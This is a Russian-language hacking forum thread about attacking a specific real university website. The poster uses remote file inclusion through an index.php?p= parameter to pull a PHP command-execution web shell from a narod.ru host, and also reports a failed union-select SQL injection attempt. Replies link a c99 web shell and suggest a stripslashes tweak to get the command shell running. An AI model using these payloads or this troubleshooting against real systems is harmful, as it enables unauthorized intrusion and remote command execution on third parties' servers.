привет всем..люди у мя такая проблема на сайте есть такое index.php?p= удаленный инклудинг...но по неизвестным мне причинам он не поддерживает например такое PHP: <pre><? @system($_REQUEST['c']); ?></pre> (который я кинул в txt и впихнул в НАРОД). В результате такая страница http://ихсайт/?p=http://что-то.narod.ru/file.txt?c=ls не катит. Но что самое удивидельное когда file.txt такой PHP: <? echo 'a'; ?> ссылка катит..вот не пойму с чего бы? а про SQL inj там еще есть такое но не смог понята почиму он не принимает сам запрос такой результ You have an error in your SQL syntax near 'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13/* ORDER BY data DESC ' at line 1
ыы) 1. "Не в том разделе" ок..сорь) 2. http://ихсайт/?p=http://что-то.narod.ru/file.txt&c=ls ну понятно ж что так http://sicurezza.uniss.it/index.php?p=http://axhack.narod.ru/1.txt?c=ls ))
http://sicurezza.uniss.it/index.php?p=http://dermoshell.narod.ru/c99madshell.php Safe-mode: ON (secure) Может поэтому?
не <pre><? @system($_REQUEST['c']); ?></pre> а <pre><? @system(stripslashes($_REQUEST['c'])); ?></pre> Должно работать... ========= ИМХО не в этом там проблема но попытка не пытка
